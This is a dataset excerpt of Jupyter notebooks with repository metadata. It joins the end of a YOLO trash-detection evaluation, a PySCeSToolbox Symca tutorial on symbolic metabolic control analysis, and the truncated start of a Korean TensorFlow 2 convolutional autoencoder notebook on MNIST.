v_boxes[i]\n\t\t# get coordinates\n\t\ty1, x1, y2, x2 = box.ymin, box.xmin, box.ymax, box.xmax\n\t\t# calculate width and height of the box\n\t\twidth, height = x2 - x1, y2 - y1\n\t\t# create the shape\n\t\trect = Rectangle((x1, y1), width, height, fill=False, color='white') \n\t\t# draw the box\n\t\tax.add_patch(rect)\n\t\t# draw text and score in top left corner\n\t\tlabel = \"%s (%.3f)\" % (v_labels[i], v_scores[i])\n\t\tpyplot.text(x1, y1, label, color='white')\n\t# show the plot\n\tpyplot.show()\ndraw_boxes", "_____no_output_____" ] ], [ [ "### **Detection**", "_____no_output_____" ] ], [ [ "%cd '/content/drive/MyDrive/yolo_custom_model_Training/custom_data/'\ninput_w, input_h = 416, 416\nanchors = [[116,90, 156,198, 373,326], [30,61, 62,45, 59,119], [10,13, 16,30, 33,23]] \nclass_threshold = 0.15\npred_right = 0\nlabels = ['clear_plastic_bottle','plastic_bottle_cap','drink_can','plastic_straw','paper_straw',\n'disposable_plastic_cup','styrofoam_piece','glass_bottle','pop_tab','paper_bag','plastic_utensils',\n'normal_paper','plastic_lid']\nfilepath = '/content/drive/MyDrive/yolo_custom_model_Training/custom_data/'\n\nfor im in 
os.listdir(filepath):\n image, image_w, image_h = load_image_pixels(im, (input_w, input_h))\n yhat = model.predict(image)\n boxes = list()\n for i in range(len(yhat)):\n \tboxes += decode_netout(yhat[i][0], anchors[i], class_threshold, input_h, input_w)\n correct_yolo_boxes(boxes, image_h, image_w, input_h, input_w)\n do_nms(boxes, 0.1) \n v_boxes, v_labels, v_scores = get_boxes(boxes, labels, class_threshold)\n\n if len(v_labels)!=0:\n image_name, useless = im.split('.')\n if image_name[:-3] == v_labels[0]:\n pred_right +=1\n\naccuracy = '{:.2%}'.format(pred_right/130)\nprint(\"the detection accuracy is \" + accuracy)\n", "/content/drive/MyDrive/yolo_custom_model_Training/custom_data\nthe detection accuracy is 8.46%\n" ], [ "pred_right", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ] ]
cb1fb6551f0fc9501cc379065ba91b048a5b28a1
351,588
ipynb
Jupyter Notebook
documentation/notebooks/Symca.ipynb
PySCeS/PyscesToolbox
f1f7a8b901e3c32023079e0ad3e523dcf866a53c
[ "BSD-3-Clause" ]
3
2017-07-24T16:29:03.000Z
2018-10-04T13:29:24.000Z
documentation/notebooks/Symca.ipynb
PySCeS/PyscesToolbox
f1f7a8b901e3c32023079e0ad3e523dcf866a53c
[ "BSD-3-Clause" ]
3
2015-11-03T09:52:30.000Z
2020-08-21T08:45:33.000Z
documentation/notebooks/Symca.ipynb
PySCeS/PyscesToolbox
f1f7a8b901e3c32023079e0ad3e523dcf866a53c
[ "BSD-3-Clause" ]
2
2016-12-08T07:44:17.000Z
2017-09-19T07:32:45.000Z
171.506341
54,180
0.878639
[ [ [ "################################ NOTES ##############################ex\n# Lines of code that are to be excluded from the documentation are #ex\n# marked with `#ex` at the end of the line. #ex\n# #ex\n# To ensure that figures are displayed correctly together with widgets #ex\n# in the sphinx documentation we will include screenshots of some of #ex\n# the produced figures. #ex\n# Do not run cells with the `display(Image('path_to_image'))` code to #ex\n# avoid duplication of results in the notebook. #ex\n# #ex\n# Some reStructuredText 2 (ReST) syntax is included to aid in #ex\n# conversion to ReST for the sphinx documentation. #ex\n#########################################################################ex\nnotebook_dir = %pwd #ex\nimport pysces #ex\nimport psctb #ex\nimport numpy #ex\nfrom os import path #ex\nfrom IPython.display import display, Image #ex\nfrom sys import platform #ex\n%matplotlib inline ", "_____no_output_____" ] ], [ [ "# Symca\n\nSymca is used to perform symbolic metabolic control analysis [[3,4]](references.html) on metabolic pathway models in order to dissect the control properties of these pathways in terms of the different chains of local effects (or control patterns) that make up the total control coefficient values. Symbolic/algebraic expressions are generated for each control coefficient in a pathway which can be subjected to further analysis.\n\n## Features\n\n* Generates symbolic expressions for each control coefficient of a metabolic pathway model. \n* Splits control coefficients into control patterns that indicate the contribution of different chains of local effects.\n* Control coefficient and control pattern expressions can be manipulated using standard `SymPy` functionality. \n* Values of control coefficient and control pattern values are determined automatically and updated automatically following the calculation of standard (non-symbolic) control coefficient values subsequent to a parameter alteration.\n* Analysis sessions (raw expression data) can be saved to disk for later use. \n* The effect of parameter scans on control coefficient and control patters can be generated and displayed using `ScanFig`.\n* Visualisation of control patterns by using `ModelGraph` functionality.\n* Saving/loading of `Symca` sessions.\n* Saving of control pattern results.\n\n## Usage and feature walkthrough\n\n### Workflow\n\nPerforming symbolic control analysis with `Symca` usually requires the following steps:\n\n1. Instantiation of a `Symca` object using a `PySCeS` model object.\n2. Generation of symbolic control coefficient expressions.\n3. Access generated control coefficient expression results via `cc_results` and the corresponding control coefficient name (see [Basic Usage](basic_usage.ipynb#syntax))\n4. Inspection of control coefficient values.\n5. Inspection of control pattern values and their contributions towards the total control coefficient values. \n6. Inspection of the effect of parameter changes (parameter scans) on the values of control coefficients and control patterns and the contribution of control patterns towards control coefficients.\n7. Session/result saving if required\n8. Further analysis.\n\n### Object instantiation\n\nInstantiation of a `Symca` analysis object requires `PySCeS` model object (`PysMod`) as an argument. 
Using the included [lin4_fb.psc](included_files.html#lin4-fb-psc) model a `Symca` session is instantiated as follows:\n", "_____no_output_____" ] ], [ [ "mod = pysces.model('lin4_fb')\nsc = psctb.Symca(mod)", "Assuming extension is .psc\nUsing model directory: /home/jr/Pysces/psc\n/home/jr/Pysces/psc/lin4_fb.psc loading ..... \nParsing file: /home/jr/Pysces/psc/lin4_fb.psc\nInfo: \"X4\" has been initialised but does not occur in a rate equation\n \nCalculating L matrix . . . . . . . done.\nCalculating K matrix . . . . . . . done.\n \n(hybrd) The solution converged.\n" ] ], [ [ "Additionally `Symca` has the following arguments:\n\n* `internal_fixed`: This must be set to `True` in the case where an internal metabolite has a fixed concentration *(default: `False`)*\n* `auto_load`: If `True` `Symca` will try to load a previously saved session. Saved data is unaffected by the `internal_fixed` argument above *(default: `False`)*.", "_____no_output_____" ], [ ".. note:: For the case where an internal metabolite is fixed see [Fixed internal metabolites](Symca.ipynb#fixed-internal-metabolites) below.", "_____no_output_____" ], [ "### Generating symbolic control coefficient expressions\n\nControl coefficient expressions can be generated as soon as a `Symca` object has been instantiated using the `do_symca` method. This process can potentially take quite some time to complete, therefore we recommend saving the generated expressions for later loading (see [Saving/Loading Sessions](Symca.ipynb#saving-loading-sessions) below). In the case of `lin4_fb.psc` expressions should be generated within a few seconds.", "_____no_output_____" ] ], [ [ "sc.do_symca()", "Simplifying matrix with 28 elements\n****************************\n" ] ], [ [ "`do_symca` has the following arguments:\n\n* `internal_fixed`: This must be set to `True` in the case where an internal metabolite has a fixed concentration *(default: `False`)*\n* `auto_save_load`: If set to `True` `Symca` will attempt to load a previously saved session and only generate new expressions in case of a failure. After generation of new results, these results will be saved instead. Setting `internal_fixed` to `True` does not affect previously saved results that were generated with this argument set to `False` *(default: `False`)*.", "_____no_output_____" ], [ "### Accessing control coefficient expressions\n\nGenerated results may be accessed via a dictionary-like `cc_results` object (see [Basic Usage - Tables](basic_usage.ipynb#tables)). 
Inspecting this `cc_results` object in a IPython/Jupyter notebook yields a table of control coefficient values:", "_____no_output_____" ] ], [ [ "sc.cc_results", "_____no_output_____" ] ], [ [ "Inspecting an individual control coefficient yields a symbolic expression together with a value:", "_____no_output_____" ] ], [ [ "sc.cc_results.ccJR1_R4", "_____no_output_____" ] ], [ [ "In the above example, the expression of the control coefficient consists of two numerator terms and a common denominator shared by all the control coefficient expression signified by $\\Sigma$.", "_____no_output_____" ], [ "Various properties of this control coefficient can be accessed such as the:\n* Expression (as a `SymPy` expression)", "_____no_output_____" ] ], [ [ "sc.cc_results.ccJR1_R4.expression", "_____no_output_____" ] ], [ [ "* Numerator expression (as a `SymPy` expression)", "_____no_output_____" ] ], [ [ "sc.cc_results.ccJR1_R4.numerator", "_____no_output_____" ] ], [ [ "* Denominator expression (as a `SymPy` expression)", "_____no_output_____" ] ], [ [ "sc.cc_results.ccJR1_R4.denominator", "_____no_output_____" ] ], [ [ "* Value (as a `float64`)", "_____no_output_____" ] ], [ [ "sc.cc_results.ccJR1_R4.value", "_____no_output_____" ] ], [ [ "Additional, less pertinent, attributes are `abs_value`, `latex_expression`, `latex_expression_full`, `latex_numerator`, `latex_name`, `name` and `denominator_object`.", "_____no_output_____" ], [ "The individual control coefficient numerator terms, otherwise known as control patterns, may also be accessed as follows:", "_____no_output_____" ] ], [ [ "sc.cc_results.ccJR1_R4.CP001", "_____no_output_____" ], [ "sc.cc_results.ccJR1_R4.CP002", "_____no_output_____" ] ], [ [ "Each control pattern is numbered arbitrarily starting from 001 and has similar properties as the control coefficient object (i.e., their expression, numerator, value etc. can also be accessed).\n\n#### Control pattern percentage contribution\n\nAdditionally control patterns have a `percentage` field which indicates the degree to which a particular control pattern contributes towards the overall control coefficient value:", "_____no_output_____" ] ], [ [ "sc.cc_results.ccJR1_R4.CP001.percentage", "_____no_output_____" ], [ "sc.cc_results.ccJR1_R4.CP002.percentage", "_____no_output_____" ] ], [ [ "Unlike conventional percentages, however, these values are calculated as percentage contribution towards the sum of the absolute values of all the control coefficients (rather than as the percentage of the total control coefficient value). This is done to account for situations where control pattern values have different signs.\n\nA particularly problematic example of where the above method is necessary, is a hypothetical control coefficient with a value of zero, but with two control patterns with equal value but opposite signs. In this case a conventional percentage calculation would lead to an undefined (`NaN`) result, whereas our methodology would indicate that each control pattern is equally ($50\\%$) responsible for the observed control coefficient value.", "_____no_output_____" ], [ "### Dynamic value updating\n\nThe values of the control coefficients and their control patterns are automatically updated when new steady-state\nelasticity coefficients are calculated for the model. 
Thus changing a parameter of `lin4_hill`, such as the $V_{f}$ value of reaction 4, will lead to new control coefficient and control pattern values:", "_____no_output_____" ] ], [ [ "mod.reLoad()\n# mod.Vf_4 has a default value of 50\nmod.Vf_4 = 0.1\n# calculating new steady state\nmod.doMca()", "\nParsing file: /home/jr/Pysces/psc/lin4_fb.psc\nInfo: \"X4\" has been initialised but does not occur in a rate equation\n \nCalculating L matrix . . . . . . . done.\nCalculating K matrix . . . . . . . done.\n \n(hybrd) The solution converged.\n" ], [ "# now ccJR1_R4 and its two control patterns should have new values\nsc.cc_results.ccJR1_R4", "_____no_output_____" ], [ "# original value was 0.000\nsc.cc_results.ccJR1_R4.CP001", "_____no_output_____" ], [ "# original value was 0.964\nsc.cc_results.ccJR1_R4.CP002", "_____no_output_____" ], [ "# resetting to default Vf_4 value and recalculating\nmod.reLoad()\nmod.doMca()", "\nParsing file: /home/jr/Pysces/psc/lin4_fb.psc\nInfo: \"X4\" has been initialised but does not occur in a rate equation\n \nCalculating L matrix . . . . . . . done.\nCalculating K matrix . . . . . . . done.\n \n(hybrd) The solution converged.\n" ] ], [ [ "### Control pattern graphs\n\nAs described under [Basic Usage](basic_usage.ipynb#graphic-representation-of-metabolic-networks), `Symca` has the functionality to display the chains of local effects represented by control patterns on a scheme of a metabolic model. This functionality can be accessed via the `highlight_patterns` method:", "_____no_output_____" ] ], [ [ "# This path leads to the provided layout file \npath_to_layout = '~/Pysces/psc/lin4_fb.dict'\n\n# Correct path depending on platform - necessary for platform independent scripts\nif platform == 'win32' and pysces.version.current_version_tuple() < (0,9,8):\n path_to_layout = psctb.utils.misc.unix_to_windows_path(path_to_layout)\nelse:\n path_to_layout = path.expanduser(path_to_layout)", "_____no_output_____" ], [ "sc.cc_results.ccJR1_R4.highlight_patterns(height = 350, pos_dic=path_to_layout)", "Widget Javascript not detected. It may not be installed or enabled properly.\n" ], [ "# To avoid duplication - do not run #ex\ndisplay(Image(path.join(notebook_dir,'images','sc_model_graph_1.png'))) #ex", "_____no_output_____" ] ], [ [ "`highlight_patterns` has the following optional arguments:\n\n* `width`: Sets the width of the graph (*default*: 900).\n* `height`:Sets the height of the graph (*default*: 500).\n* `show_dummy_sinks`: If `True` reactants with the \"dummy\" or \"sink\" will not be displayed (*default*: `False`).\n* `show_external_modifier_links`: If `True` edges representing the interaction of external effectors with reactions will be shown (*default*: `False`).\n\nClicking either of the two buttons representing the control patterns highlights these patterns according according to their percentage contribution (as discussed [above](Symca.ipynb#control-pattern-percentage-contribution)) towards the total control coefficient.", "_____no_output_____" ] ], [ [ "# clicking on CP002 shows that this control pattern representing \n# the chain of effects passing through the feedback loop\n# is totally responsible for the observed control coefficient value.\nsc.cc_results.ccJR1_R4.highlight_patterns(height = 350, pos_dic=path_to_layout)", "Widget Javascript not detected. 
It may not be installed or enabled properly.\n" ], [ "# To avoid duplication - do not run #ex\ndisplay(Image(path.join(notebook_dir,'images','sc_model_graph_2.png'))) #ex", "_____no_output_____" ], [ "# clicking on CP001 shows that this control pattern representing \n# the chain of effects of the main pathway does not contribute\n# at all to the control coefficient value.\nsc.cc_results.ccJR1_R4.highlight_patterns(height = 350, pos_dic=path_to_layout)", "Widget Javascript not detected. It may not be installed or enabled properly.\n" ], [ "# To avoid duplication - do not run #ex\ndisplay(Image(path.join(notebook_dir,'images','sc_model_graph_3.png'))) #ex", "_____no_output_____" ] ], [ [ "### Parameter scans\n\nParameter scans can be performed in order to determine the effect of a parameter change on either the control coefficient and control pattern values or of the effect of a parameter change on the contribution of the control patterns towards the control coefficient (as discussed [above](Symca.ipynb#control-pattern-percentage-contribution)). The procedures for both the \"value\" and \"percentage\" scans are very much the same and rely on the same principles as described in the [Basic Usage](basic_usage.ipynb#plotting-and-displaying-results) and [RateChar](RateChar.ipynb#plotting-results) sections.\n\nTo perform a parameter scan the `do_par_scan` method is called. This method has the following arguments:\n\n* `parameter`: A String representing the parameter which should be varied.\n* `scan_range`: Any iterable representing the range of values over which to vary the parameter (typically a NumPy `ndarray` generated by `numpy.linspace` or `numpy.logspace`).\n* `scan_type`: Either `\"percentage\"` or `\"value\"` as described above (*default*: `\"percentage\"`).\n* `init_return`: If `True` the parameter value will be reset to its initial value after performing the parameter scan (*default*: `True`).\n* `par_scan`: If `True`, the parameter scan will be performed by multiple parallel processes rather than a single process, thus speeding performance (*default*: `False`).\n* `par_engine`: Specifies the engine to be used for the parallel scanning processes. Can either be `\"multiproc\"` or `\"ipcluster\"`. A discussion of the differences between these methods are beyond the scope of this document, see [here](http://www.davekuhlman.org/python_multiprocessing_01.html) for a brief overview of Multiprocessing in Python. (*default*: `\"multiproc\"`).\n* `force_legacy`: If `True` `do_par_scan` will use a older and slower algorithm for performing the parameter scan. This is mostly used for debugging purposes. (*default*: `False`)\n\n\nBelow we will perform a percentage scan of $V_{f4}$ for 200 points between 0.01 and 1000 in log space:", "_____no_output_____" ] ], [ [ "percentage_scan_data = sc.cc_results.ccJR1_R4.do_par_scan(parameter='Vf_4',\n scan_range=numpy.logspace(-1,3,200),\n scan_type='percentage')", "MaxMode 1\n0 min 0 sec\nSCANNER: Tsteps 200\n\nSCANNER: 200 states analysed\n\n(hybrd) The solution converged.\n" ] ], [ [ "As previously described, these data can be displayed using `ScanFig` by calling the `plot` method of `percentage_scan_data`. 
Furthermore, lines can be enabled/disabled using the `toggle_category` method of `ScanFig` or by clicking on the appropriate buttons:", "_____no_output_____" ] ], [ [ "percentage_scan_plot = percentage_scan_data.plot()\n\n# set the x-axis to a log scale\npercentage_scan_plot.ax.semilogx()\n\n# enable all the lines\npercentage_scan_plot.toggle_category('Control Patterns', True)\npercentage_scan_plot.toggle_category('CP001', True)\npercentage_scan_plot.toggle_category('CP002', True)\n\n# display the plot\npercentage_scan_plot.interact()\n#remove_next", "_____no_output_____" ], [ "# To avoid duplication - do not run #ex\ndisplay(Image(path.join(notebook_dir,'images','sc_perscan.png'))) #ex", "_____no_output_____" ] ], [ [ "A `value` plot can similarly be generated and displayed. In this case, however, an additional line indicating $C^{J}_{4}$ will also be present:", "_____no_output_____" ] ], [ [ "value_scan_data = sc.cc_results.ccJR1_R4.do_par_scan(parameter='Vf_4',\n scan_range=numpy.logspace(-1,3,200),\n scan_type='value')\n\nvalue_scan_plot = value_scan_data.plot()\n\n# set the x-axis to a log scale\nvalue_scan_plot.ax.semilogx()\n\n# enable all the lines\nvalue_scan_plot.toggle_category('Control Coefficients', True)\nvalue_scan_plot.toggle_category('ccJR1_R4', True)\n\nvalue_scan_plot.toggle_category('Control Patterns', True)\nvalue_scan_plot.toggle_category('CP001', True)\nvalue_scan_plot.toggle_category('CP002', True)\n\n# display the plot\nvalue_scan_plot.interact()\n#remove_next", "_____no_output_____" ], [ "# To avoid duplication - do not run #ex\ndisplay(Image(path.join(notebook_dir,'images','sc_valscan.png'))) #ex", "_____no_output_____" ] ], [ [ "### Fixed internal metabolites\n\nIn the case where the concentration of an internal intermediate is fixed (such as in the case of a GSDA) the `internal_fixed` argument must be set to `True` in either the `do_symca` method, or when instantiating the `Symca` object. This will typically result in the creation of a `cc_results_N` object for each separate reaction block, where `N` is a number starting at 0. Results can then be accessed via these objects as with normal free internal intermediate models.\n\nThus for a variant of the `lin4_fb` model where the intermediate`S3` is fixed at its steady-state value the procedure is as follows:", "_____no_output_____" ] ], [ [ "# Create a variant of mod with 'C' fixed at its steady-state value\nmod_fixed_S3 = psctb.modeltools.fix_metabolite_ss(mod, 'S3')\n\n# Instantiate Symca object the 'internal_fixed' argument set to 'True'\nsc_fixed_S3 = psctb.Symca(mod_fixed_S3,internal_fixed=True)\n\n# Run the 'do_symca' method (internal_fixed can also be set to 'True' here)\nsc_fixed_S3.do_symca() ", "(hybrd) The solution converged.\n\nI hope we have a filebuffer\nSeems like it\n\nReaction stoichiometry and rate equations\n\nSpecies initial values\n\nParameters\nAssuming extension is .psc\nUsing model directory: /home/jr/Pysces/psc\nUsing file: lin4_fb_S3.psc\n/home/jr/Pysces/psc/orca/lin4_fb_S3.psc loading ..... \nParsing file: /home/jr/Pysces/psc/orca/lin4_fb_S3.psc\nInfo: \"X4\" has been initialised but does not occur in a rate equation\n \nCalculating L matrix . . . . . . . done.\nCalculating K matrix . . . . . . . done.\n \n(hybrd) The solution converged.\nSimplifying matrix with 24 elements\n************************\n" ] ], [ [ "The normal `sc_fixed_S3.cc_results` object is still generated, but will be invalid for the fixed model. 
Each additional `cc_results_N` contains control coefficient expressions that have the same common denominator and corresponds to a specific reaction block. These `cc_results_N` objects are numbered arbitrarily, but consistantly accross different sessions. Each results object accessed and utilised in the same way as the normal `cc_results` object. \n\nFor the `mod_fixed_c` model two additional results objects (`cc_results_0` and `cc_results_1`) are generated:\n\n\n\n* `cc_results_1` contains the control coefficients describing the sensitivity of flux and concentrations within the supply block of `S3` towards reactions within the supply block. ", "_____no_output_____" ] ], [ [ "sc_fixed_S3.cc_results_1", "_____no_output_____" ] ], [ [ "* `cc_results_0` contains the control coefficients describing the sensitivity of flux and concentrations of either reaction block towards reactions in the other reaction block (i.e., all control coefficients here should be zero). Due to the fact that the `S3` demand block consists of a single reaction, this object also contains the control coefficient of `R4` on `J_R4`, which is equal to one. This results object is useful confirming that the results were generated as expected. ", "_____no_output_____" ] ], [ [ "sc_fixed_S3.cc_results_0", "_____no_output_____" ] ], [ [ "If the demand block of `S3` in this pathway consisted of multiple reactions, rather than a single reaction, there would have been an additional `cc_results_N` object containing the control coefficients of that reaction block. ", "_____no_output_____" ], [ "### Saving results\n\nIn addition to being able to save parameter scan results (as previously described), a summary of the control coefficient and control pattern results can be saved using the `save_results` method. This saves a `csv` file (by default) to disk to any specified location. If no location is specified, a file named `cc_summary_N` is saved to the `~/Pysces/$modelname/symca/` directory, where `N` is a number starting at 0:\n", "_____no_output_____" ] ], [ [ "sc.save_results()", "_____no_output_____" ] ], [ [ "`save_results` has the following optional arguments:\n\n* `file_name`: Specifies a path to save the results to. If `None`, the path defaults as described above.\n* `separator`: The separator between fields (*default*: `\",\"`)", "_____no_output_____" ], [ "The contents of the saved data file is as follows:", "_____no_output_____" ] ], [ [ "# the following code requires `pandas` to run\nimport pandas as pd\n# load csv file at default path\nresults_path = '~/Pysces/lin4_fb/symca/cc_summary_0.csv'\n\n# Correct path depending on platform - necessary for platform independent scripts\nif platform == 'win32' and pysces.version.current_version_tuple() < (0,9,8):\n results_path = psctb.utils.misc.unix_to_windows_path(results_path)\nelse:\n results_path = path.expanduser(results_path)\n\nsaved_results = pd.read_csv(results_path)\n# show first 20 lines\nsaved_results.head(n=20) ", "_____no_output_____" ] ], [ [ "### Saving/loading sessions\n\nSaving and loading `Symca` sessions is very simple and works similar to `RateChar`. Saving a session takes place with the `save_session` method, whereas the `load_session` method loads the saved expressions. As with the `save_results` method and most other saving and loading functionality, if no `file_name` argument is provided, files will be saved to the default directory (see also [Basic Usage](basic_usage.ipynb#saving-and-default-directories)). 
As previously described, expressions can also be loaded/saved automatically by `do_symca` via the `auto_save_load` argument, which saves and loads using the default path. Models with internal fixed metabolites are handled automatically.", "_____no_output_____" ] ], [ [ "# saving session\nsc.save_session()\n\n# create new Symca object and load saved results\nnew_sc = psctb.Symca(mod)\nnew_sc.load_session()\n\n# display saved results\nnew_sc.cc_results", "(hybrd) The solution converged.\n" ] ] ]
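A minimal sketch of reloading a saved `Symca` session from a fresh script, assuming `pysces` and `psctb` are importable under those names as in the notebook's opening cell; it reuses only calls demonstrated above (`pysces.model`, `psctb.Symca`, `load_session`, and the `value`/`percentage` attributes).

```python
# Minimal sketch, assuming the import names used throughout the notebook.
import pysces
import psctb  # PySCeSToolbox

mod = pysces.model('lin4_fb')

sc_new = psctb.Symca(mod)
sc_new.load_session()  # loads the expressions stored by save_session()

cc = sc_new.cc_results.ccJR1_R4
print('ccJR1_R4 value:', cc.value)
print('CP001 share   :', cc.CP001.percentage, '%')
print('CP002 share   :', cc.CP002.percentage, '%')
```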
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
cb1fb76ec0e3ced15bdbdb0af030574e89a6855b
389,728
ipynb
Jupyter Notebook
AutoEncoder_Conv(TensorFlow_2).ipynb
bluesky0960/AI_Study
5df0f4b7d125d504a06c390974aea872f42e34b3
[ "MIT" ]
null
null
null
AutoEncoder_Conv(TensorFlow_2).ipynb
bluesky0960/AI_Study
5df0f4b7d125d504a06c390974aea872f42e34b3
[ "MIT" ]
null
null
null
AutoEncoder_Conv(TensorFlow_2).ipynb
bluesky0960/AI_Study
5df0f4b7d125d504a06c390974aea872f42e34b3
[ "MIT" ]
null
null
null
125.1535
84,686
0.831719
[ [ [ "<a href=\"https://colab.research.google.com/github/bluesky0960/AI_Study/blob/master/AutoEncoder_Conv(TensorFlow_2).ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>", "_____no_output_____" ], [ "# 오토인코더 (TensorFlow 2)\n텐서플로우 2에서 제공하는 고수준 API인 케라스를 이용해, 오토인코더(autoencoder)를 구현한다.\n* Google Colab 환경에서 사용하는 경우에 초점을 맞춤.\n* 텐서플로우 2\n* 텐서플로우 2 내장 케라스 기준\n\n참고문헌\n* [TensorFlow 소개](https://www.tensorflow.org/learn)\n* [TensorFlow > 학습 > TensorFlow Core > 가이드 > 케라스: 빠르게 훑어보기](https://www.tensorflow.org/guide/keras/overview)\n* [Deep Learning with Python, by Francois Chollet](https://github.com/fchollet/deep-learning-with-python-notebooks)\n\n\n주의사항\n* Colab에서 코드에 이상이 없음에도 불구하고 결과가 제대로 나오지 않을 경우, '런타임 다시 시작...'을 해보도록 한다.'\n\n\n## Deep Neural Network 기초\n다음 비디오를 보고 심층신경망(deep neural network) 기반 딥러닝 기법은 이해하도록 한다.\n* [신경망이란 무엇인가? | 1장.딥러닝에 관하여 (3Blue1Brown)](https://youtu.be/aircAruvnKk)\n* [경사 하강, 신경 네트워크가 학습하는 방법 | 심층 학습, 2장 (3Blue1Brown)](https://youtu.be/IHZwWFHWa-w)\n* [What is backpropagation really doing? | Deep learning, chapter 3 (3Blue1Brown)](https://youtu.be/Ilg3gGewQ5U)\n* [Backpropagation calculus | Deep learning, chapter 4 (3Blue1Brown)](https://youtu.be/tIeHLnjs5U8)\n\n\n## Tensorflow 2과 Keras를 사용하기 위한 구성\n```\nimport tensorflow as tf # 텐서플로우 임포트\nfrom tensorflow.keras import models, layers # 케라스 관련 모듈 임포트\nimport numpy as np\n\nprint(tf.__version__) # 텐서플로우 버전을 확인하도록 한다.\nprint(tf.keras.__version__) # 케라스 버전을 확인한다.\n```", "_____no_output_____" ] ], [ [ "import tensorflow as tf # 텐서플로우 임포트\nfrom tensorflow.keras import models, layers # 케라스 관련 모듈 임포트\nimport numpy as np\nimport matplotlib.pyplot as plt\n \nprint(tf.__version__) # 텐서플로우 버전을 확인하도록 한다.\nprint(tf.keras.__version__) # 케라스 버전을 확인한다.", "2.2.0-rc3\n2.3.0-tf\n" ] ], [ [ "## MNIST 데이터셋 띄우기\n* mnist 데이터셋은 LeCun이 만든 숫자(digit) 손글씨 데이터셋이다.\n* 60,000개의 트레이닝 데이터와 10,000개의 테스트 데이터로 이루어져 있다.\n\n\n### MNIST 이미지 데이터\n* 트레이닝 이미지와 테스트 이미지에 들어 있는 영상은 3차원 텐서이다.\n + 트레이닝 이미지의 경우, shape = (60000, 28, 28)\n + 테스트 이미지의 경우, shape=(10000, 28, 28)\n* 3차원 텐서는 다음의 의미로 구성되어 있음을 유념하자.\n + (# of images, image Height, image Width) 혹은 (# of images, # of Rows, # of Columns) \n* 각 이미지를 Conv2D Layer에 넣기 위해 reshape 함수를 통해 축을 하나 추가해준다.\n + 트레이닝 이미지의 경우, shape = (60000, 28, 28, 1)\n + 테스트 이미지의 경우, shape = (10000, 28, 28, 1)\n* 각 영상은 28 x 28 크기로 구성되어 있다.\n* 각 픽셀은 [0, 255] 사이의 uint8형 값이다.\n + 반드시, 텐서플로우에 입력으로 넣을 때, 픽셀값을 [0, 1] 사이의 float64형 값으로 변환하도록 하자.\n\n\n### MNIST 라벨 데이터\n* 각 라벨은 [0, 9] 사이의 unit8형 값이다.", "_____no_output_____" ] ], [ [ "# MNIST 데이터 로딩\nmnist = tf.keras.datasets.mnist\n\n(train_images, train_labels), (test_images, test_labels) = mnist.load_data()\n\nprint('train_images의 *원래* 데이터의 shape과 dype:', \n train_images.shape, train_images.dtype)\nprint('test_images의 *원래* 데이터의 shape과 dype:', \n test_images.shape, test_images.dtype)\n\n# Conv2d layer를 위해 축 추가\ntrain_images = np.reshape(train_images, (len(train_images),28, 28, 1))\ntest_images = np.reshape(test_images, (len(test_images),28, 28, 1))\n\n# Normalizing the images to the range of [0., 1.]\ntrain_images = tf.cast(train_images, tf.float32)\ntest_images = tf.cast(test_images, tf.float32)\ntrain_images /= 255\ntest_images /= 255\n\nprint('train_images의 *바뀐* 데이터의 shape과 dype:', \n train_images.shape, train_images.dtype)\nprint('test_images의 *바뀐* 데이터의 shape과 dype:', \n test_images.shape, test_images.dtype)\n\n\n# Print out for 
